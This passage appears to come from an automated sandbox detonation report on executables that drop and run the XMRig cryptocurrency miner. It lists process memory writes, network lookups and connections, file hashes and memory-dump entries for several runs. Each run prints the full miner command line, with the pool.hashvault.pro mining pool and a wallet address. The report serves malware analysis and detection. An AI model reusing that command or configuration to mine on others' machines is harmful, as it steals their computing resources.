| PID 3196 wrote to memory of 4456 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3196 wrote to memory of 4456 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.183.117.104.in-addr.arpa | udp |
| US | 52.111.227.11:443 | tcp | |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4456-16-0x000002358C8F0000-0x000002358C910000-memory.dmp
memory/4456-17-0x000002358C940000-0x000002358C960000-memory.dmp
memory/4456-18-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-20-0x000002358C960000-0x000002358C980000-memory.dmp
memory/4456-19-0x000002358C980000-0x000002358C9A0000-memory.dmp
memory/4456-21-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-22-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-23-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-24-0x000002358C980000-0x000002358C9A0000-memory.dmp
memory/4456-25-0x000002358C960000-0x000002358C980000-memory.dmp
memory/4456-26-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-27-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-28-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-29-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-30-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-31-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-32-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-33-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-34-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-35-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-36-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-37-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-38-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-39-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-40-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-41-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-42-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-43-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-44-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-45-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-46-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-47-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-48-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-49-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-50-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-51-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-52-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-53-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-54-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-55-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-56-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-57-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-58-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-59-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-60-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-61-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-62-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-63-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-64-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-65-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-66-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-67-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-68-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-69-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-70-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-71-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-72-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-73-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-74-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-75-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-76-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-77-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-78-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-79-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-80-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-81-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-82-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-83-0x00007FF795730000-0x00007FF796233000-memory.dmp
memory/4456-84-0x00007FF795730000-0x00007FF796233000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1780 wrote to memory of 4652 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1780 wrote to memory of 4652 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4652-16-0x000001AEB1570000-0x000001AEB1590000-memory.dmp
memory/4652-17-0x000001AEB2D80000-0x000001AEB2DA0000-memory.dmp
memory/4652-18-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-19-0x000001AEB2DC0000-0x000001AEB2DE0000-memory.dmp
memory/4652-20-0x000001AEB2DA0000-0x000001AEB2DC0000-memory.dmp
memory/4652-21-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-22-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-25-0x000001AEB2DA0000-0x000001AEB2DC0000-memory.dmp
memory/4652-24-0x000001AEB2DC0000-0x000001AEB2DE0000-memory.dmp
memory/4652-23-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-26-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-27-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-28-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-29-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-30-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-31-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-32-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-33-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-34-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-35-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-36-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-37-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-38-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-39-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-40-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-41-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-42-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-43-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-44-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-45-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-46-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-47-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-48-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-49-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-50-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-51-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-52-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-53-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-54-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-55-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-56-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-57-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-58-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-59-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-60-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-61-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-62-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-63-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-64-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-65-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-66-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-67-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-68-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-69-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-70-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-71-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-72-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-73-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-74-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-75-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-76-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-77-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-78-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-79-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-80-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-81-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-82-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-83-0x00007FF700750000-0x00007FF701253000-memory.dmp
memory/4652-84-0x00007FF700750000-0x00007FF701253000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3148 wrote to memory of 932 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3148 wrote to memory of 932 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.201.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/932-16-0x000002BD6F980000-0x000002BD6F9A0000-memory.dmp
memory/932-17-0x000002BD6F9D0000-0x000002BD6F9F0000-memory.dmp
memory/932-18-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-19-0x000002BD712D0000-0x000002BD712F0000-memory.dmp
memory/932-20-0x000002BD6F9F0000-0x000002BD6FA10000-memory.dmp
memory/932-21-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-22-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-25-0x000002BD6F9F0000-0x000002BD6FA10000-memory.dmp
memory/932-24-0x000002BD712D0000-0x000002BD712F0000-memory.dmp
memory/932-23-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-26-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-27-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-28-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-29-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-30-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-31-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-32-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-33-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-34-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-35-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-36-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-37-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-38-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-39-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-40-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-41-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-42-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-43-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-44-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-45-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-46-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-47-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-48-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-49-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-50-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-51-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-52-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-53-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-54-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-55-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-56-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-57-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-58-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-59-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-60-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-61-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-62-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-63-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-64-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-65-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-66-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-67-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
